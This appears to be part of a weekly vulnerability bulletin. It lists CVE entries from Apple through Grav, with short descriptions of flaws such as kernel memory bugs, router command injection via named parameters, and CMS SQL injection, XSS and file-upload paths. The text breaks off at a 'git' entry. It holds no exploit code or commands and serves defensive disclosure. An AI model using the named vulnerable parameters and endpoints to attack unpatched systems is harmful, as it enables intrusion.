apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22617
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22615
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22626
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22625
MISC
MISC
MISC
apple — multiple_products A memory consumption issue was addressed with improved memory handling. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to heap corruption. 2022-03-18 not yet calculated CVE-2022-22612
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22611
MISC
MISC
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application’s permissions and access user data. 2022-03-18 not yet calculated CVE-2022-22650
MISC
MISC
MISC
apple — multiple_products The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen. 2022-03-18 not yet calculated CVE-2022-22652
MISC
apple — multiple_products
 
An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. 2022-03-18 not yet calculated CVE-2022-22656
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2021-30771
MISC
MISC
MISC
MISC
apple — multiple_products
 
A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript. 2022-03-18 not yet calculated CVE-2022-22589
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges. 2022-03-18 not yet calculated CVE-2022-22578
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22613
MISC
MISC
MISC
MISC
MISC
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22602
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22607
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22606
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22605
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22604
MISC
apple — xcode An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22603
MISC
apple — xcode
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22608
MISC
apple — xcode
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22601
MISC
archivista — dms
 
Cross-site Scripting (XSS) vulnerability in ArchivistaBox webclient allows an attacker to craft a malicious link, executing JavaScript in the context of a victim’s browser. This issue affects all ArchivistaBox versions prior to 2022/I. 2022-03-16 not yet calculated CVE-2021-42552
CONFIRM
argencoders-notevil — argencoders-notevil
 
This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object’s prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878). 2022-03-17 not yet calculated CVE-2021-23771
MISC
MISC
ari_fancy_lightbox  — ari_fancy_lightbox
 
The ARI Fancy Lightbox WordPress plugin before 1.3.9 does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0161
MISC
CONFIRM
arm — cortex_and_neoverse_processors
 
Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information. 2022-03-13 not yet calculated CVE-2022-23960
CONFIRM
MISC
MLIST
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the firewall-local log function via the EmailAddress, SmtpServerName, SmtpUsername, and SmtpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26990
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ntp function via the TimeZone parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26991
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pppoe function via the pppoeUserName, pppoePassword, and pppoe_Service parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26993
MISC
arris — routers Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ddns function via the DdnsUserName, DdnsHostName, and DdnsPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26992
MISC
arris — routers
 
Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pptp function via the pptpUserName and pptpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26994
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the wps setting function via the wps_enrolee_pin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26998
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pptp (wan_pptp.html) function via the pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26995
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26996
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the time and time zone function via the h_primary_ntp_server, h_backup_ntp_server, and h_time_zone parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27000
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26997
MISC
arris — tr3300 Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26999
MISC
arris — tr3300 Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the dhcp function via the hostname parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27001
MISC
arris — tr3300
 
Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27002
MISC
atlassian — fisheye_and_crucible The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability. 2022-03-16 not yet calculated CVE-2021-43956
MISC
MISC
atlassian — fisheye_and_crucible Affected versions of Atlassian Fisheye & Crucible allowed remote attackers to browse local files via an Insecure Direct Object References (IDOR) vulnerability in the WEB-INF directory and bypass the fix for CVE-2020-29446 due to a lack of url decoding. The affected versions are before version 4.8.9. 2022-03-16 not yet calculated CVE-2021-43957
MISC
MISC
atlassian — fisheye_and_crucible
 
The /rest-service-fecru/server-v1 resource in Fisheye and Crucible before version 4.8.9 allowed authenticated remote attackers to obtain information about installation directories via information disclosure vulnerability. 2022-03-16 not yet calculated CVE-2021-43955
MISC
MISC
atlassian — fisheye_and_crucible
 
Various rest resources in Fisheye and Crucible before version 4.8.9 allowed remote attackers to brute force user login credentials as rest resources did not check if users were beyond their max failed login limits and therefore required solving a CAPTCHA in addition to providing user credentials for authentication via a improper restriction of excess authentication attempts vulnerability. 2022-03-16 not yet calculated CVE-2021-43958
MISC
MISC
atom — cms
 
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the “A” parameter in /widgets/debug.php. 2022-03-15 not yet calculated CVE-2022-25489
MISC
atom — cms
 
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. 2022-03-15 not yet calculated CVE-2022-25487
MISC
atom — cms
 
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. 2022-03-15 not yet calculated CVE-2022-25488
MISC
automotive_grade_linux_kooky_koi — automotive_grade_linux_kooky_koi
 
Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required. 2022-03-18 not yet calculated CVE-2022-24595
MISC
axeda — agent_and_desktop_server_for_windows Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) uses hard-coded credentials for its UltraVNC installation. Successful exploitation of this vulnerability could allow a remote authenticated attacker to take full remote control of the host operating system. 2022-03-16 not yet calculated CVE-2022-25246
MISC
MISC
axeda — agent_and_desktop_server_for_windows Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain commands to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to obtain full file-system access and remote code execution. 2022-03-16 not yet calculated CVE-2022-25247
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send a certain command to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to shut down a specific service. 2022-03-16 not yet calculated CVE-2022-25250
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) supplies the event log of the specific service. 2022-03-16 not yet calculated CVE-2022-25248
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) (disregarding Axeda agent v6.9.2 and v6.9.3) is vulnerable to directory traversal, which could allow a remote unauthenticated attacker to obtain file system read access via web server.. 2022-03-16 not yet calculated CVE-2022-25249
MISC
MISC
axeda — agent_and_desktop_server_for_windows When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain XML messages to a specific port without proper authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to read and modify the affected product’s configuration. 2022-03-16 not yet calculated CVE-2022-25251
MISC
MISC
axeda — agent_and_desktop_server_for_windows
 
When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) when receiving certain input throws an exception. Services using said function do not handle the exception. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to crash the affected product. 2022-03-16 not yet calculated CVE-2022-25252
MISC
MISC
bareos — bareos Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, a failed PAM authentication will leak a small amount of memory. An attacker that is able to use the PAM Console (i.e. by knowing the shared secret or via the WebUI) can flood the Director with failing login attempts which will eventually lead to an out-of-memory condition in which the Director will not work anymore. Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 contain a Bugfix for this problem. Users who are unable to upgrade may disable PAM authentication as a workaround. 2022-03-15 not yet calculated CVE-2022-24756
MISC
CONFIRM
MISC
MISC
MISC
bareos — bareos
 
Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, it will skip authorization checks completely. Expired accounts and accounts with expired passwords can still login. This problem will affect users that have PAM enabled. Currently there is no authorization (e.g. check for expired or disabled accounts), but only plain authentication (i.e. check if username and password match). Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 implement the authorization check that was previously missing. The only workaround is to make sure that authentication fails if the user is not authorized. 2022-03-15 not yet calculated CVE-2022-24755
MISC
MISC
MISC
CONFIRM
MISC
bitbucket_pipeline_variable — bitbucket_pipeline_variable
 
A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality. 2022-03-16 not yet calculated CVE-2021-20180
MISC
bodymen — bodymen
 
The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897) 2022-03-17 not yet calculated CVE-2022-25296
MISC
braintree — sanitizeurl
 
The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function. 2022-03-16 not yet calculated CVE-2021-23648
MISC
MISC
MISC
MISC
brocade — fabric_os
 
A vulnerability in the Brocade Fabric OS before Brocade Fabric OS v9.0.1a, v8.2.3, v8.2.0_CBN4, and v7.4.2h could allow an authenticated CLI user to abuse the history command to write arbitrary content to files. 2022-03-18 not yet calculated CVE-2020-15388
MISC
brocade — fabric_os
 
The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program’s standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials. 2022-03-18 not yet calculated CVE-2021-27789
MISC
chainsafe — libp2p-noise
 
`@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds. 2022-03-17 not yet calculated CVE-2022-24759
MISC
MISC
CONFIRM
ckeditor4 — ckeditor4 CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24729
MISC
CONFIRM
CONFIRM
ckeditor4 — ckeditor4
 
CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24728
MISC
CONFIRM
MISC
CONFIRM
classcms — classcms
 
Classcms v2.5 and below contains an arbitrary file upload via the component \class\classupload. This vulnerability allows attackers to execute code injection via a crafted .txt file. 2022-03-18 not yet calculated CVE-2022-25581
MISC
clickhouse — dbms Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is very similar to CVE-2021-43304, but the vulnerable copy operation is in a different wildCopy call. 2022-03-14 not yet calculated CVE-2021-43305
MISC
clickhouse — dbms Divide-by-zero in Clickhouse’s Gorilla compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42391
MISC
clickhouse — dbms Divide-by-zero in Clickhouse’s Delta compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42389
MISC
clickhouse — dbms Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the lower bounds of the source of the copy operation. 2022-03-14 not yet calculated CVE-2021-42388
MISC
clickhouse — dbms Divide-by-zero in Clickhouse’s DeltaDouble compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. 2022-03-14 not yet calculated CVE-2021-42390
MISC
clickhouse — dbms
 
Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. 2022-03-14 not yet calculated CVE-2021-43304
MISC
clickhouse — dbms
 
Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the source of the copy operation. 2022-03-14 not yet calculated CVE-2021-42387
MISC
cometd — cometd
 
CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster-internal traffic that contains other users’ (possibly sensitive) data. By publishing to those channels, a remote user may be able to create/modify/delete other user’s data and modify the cluster structure. A fix is available in versions 5.0.11, 6.0.6, and 7.0.6. As a workaround, install a custom `SecurityPolicy` that forbids subscription and publishing to remote, non-Oort, sessions on Oort and Seti channels. 2022-03-15 not yet calculated CVE-2022-24721
MISC
CONFIRM
commonsbooking — commonsbooking
 
The CommonsBooking WordPress plugin before 2.6.8 does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection 2022-03-14 not yet calculated CVE-2022-0658
MISC
contact_form_x — contact_form_x
 
Reflected Cross-Site Scripting (XSS) vulnerability affecting parameter &tab discovered in Contact Form X WordPress plugin (versions <= 2.4). 2022-03-11 not yet calculated CVE-2022-25601
CONFIRM
CONFIRM
FEDORA
FEDORA
contao — managed_edition
 
Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter. 2022-03-18 not yet calculated CVE-2022-26265
MISC
countdown_coming_soon — countdown_coming_soon
 
The Countdown, Coming Soon, Maintenance WordPress plugin before 2.2.9 does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0601
CONFIRM
MISC
cri-o — cri-o
 
A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed. 2022-03-16 not yet calculated CVE-2022-0811
MISC
MISC
cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php. 2022-03-15 not yet calculated CVE-2022-25498
MISC
cuppacms — cuppacms CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. 2022-03-15 not yet calculated CVE-2022-25485
MISC
cuppacms — cuppacms The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file. 2022-03-15 not yet calculated CVE-2022-25495
MISC
cuppacms — cuppacms
 
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. 2022-03-15 not yet calculated CVE-2022-25486
MISC
cuppacms — cuppacms
 
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. 2022-03-15 not yet calculated CVE-2022-25497
MISC
cvrf-csaf-converter –cvrf-csaf-converter
 
CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter. 2022-03-15 not yet calculated CVE-2022-27193
MISC
dcn_firewall — dcme-520 DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php. 2022-03-18 not yet calculated CVE-2022-25389
MISC
dcn_firewall — dcme-520
 
DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php. 2022-03-18 not yet calculated CVE-2022-25390
MISC
delete_marker_category_delete_map_and_copy_map — delete_marker_category_delete_map_and_copy_map
 
Cross-Site Request Forgery (CSRF) vulnerability affecting Delete Marker Category, Delete Map, and Copy Map functions in WP Google Map plugin (versions <= 4.2.3). 2022-03-11 not yet calculated CVE-2022-25600
CONFIRM
CONFIRM
FEDORA
FEDORA
eos — eos
 
EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin. 2022-03-17 not yet calculated CVE-2022-26300
MISC
event_manager_and_tickets_selling_for_woocommerce — event_manager_and_tickets_selling_for_woocommerce
 
The Event Manager and Tickets Selling for WooCommerce WordPress plugin before 3.5.8 does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks 2022-03-14 not yet calculated CVE-2022-0478
CONFIRM
MISC
fasthttp — fasthttp
 
The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only. 2022-03-17 not yet calculated CVE-2022-21221
MISC
MISC
MISC
MISC
MISC
fexsrv — fexsrv
 
fexsrv in F*EX (aka Frams’ Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution). 2022-03-17 not yet calculated CVE-2020-15591
MISC
CONFIRM
fisco-bcos –fisco-bcos
 
FISCO-BCOS release-3.0.0-rc2 was discovered to contain an issue where a malicious node, via a malicious viewchange packet, will cause normal nodes to change view excessively and stop generating blocks. 2022-03-17 not yet calculated CVE-2022-26534
MISC
fish — fish
 
fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that change the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automatically runs `git` commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory into one controlled by the attacker, such as on a shared file system or extracted archive, fish will run arbitrary commands under the attacker’s control. This problem has been fixed in fish 3.4.0. Note that running git in these directories, including using the git tab completion, remains a potential trigger for this issue. As a workaround, remove the `fish_git_prompt` function from the prompt. 2022-03-14 not yet calculated CVE-2022-20001
MISC
CONFIRM
MISC
flexi — flexi
 
The Flexi WordPress plugin before 4.20 does not sanitise and escape various parameters before outputting them back in some pages such as the user dashboard, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0449
MISC
forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24772
MISC
MISC
CONFIRM
forge — forge Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24771
CONFIRM
MISC
forge — forge
 
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. 2022-03-18 not yet calculated CVE-2022-24773
MISC
CONFIRM
MISC
fuxa — fuxa
 
A Server-Side Request Forgery (SSRF) attack in FUXA 1.1.3 can be carried out leading to the obtaining of sensitive information from the server’s internal environment and services, often potentially leading to the attacker executing commands on the server. 2022-03-16 not yet calculated CVE-2021-45851
MISC
fv_flowplayer_video_player — fv_flowplayer_video_player
 
Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions <= 7.5.15.727). 2022-03-18 not yet calculated CVE-2022-25607
CONFIRM
CONFIRM
gd_mylist — gd_mylist
 
The GD Mylist WordPress plugin through 1.1.1 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0703
MISC
ge — reason_clocks A code injection vulnerability exists in one of the webpages in GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06 that could allow an authenticated remote attacker to execute arbitrary code on the system. 2022-03-18 not yet calculated CVE-2020-25197
CONFIRM
CONFIRM
ge — reason_clocks
 
By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection. 2022-03-18 not yet calculated CVE-2020-25193
CONFIRM
CONFIRM
getgrav — grav
 
Cross-site Scripting (XSS) – Stored in GitHub repository getgrav/grav prior to 1.7.31. 2022-03-15 not yet calculated CVE-2022-0970
MISC
CONFIRM
git — git
 
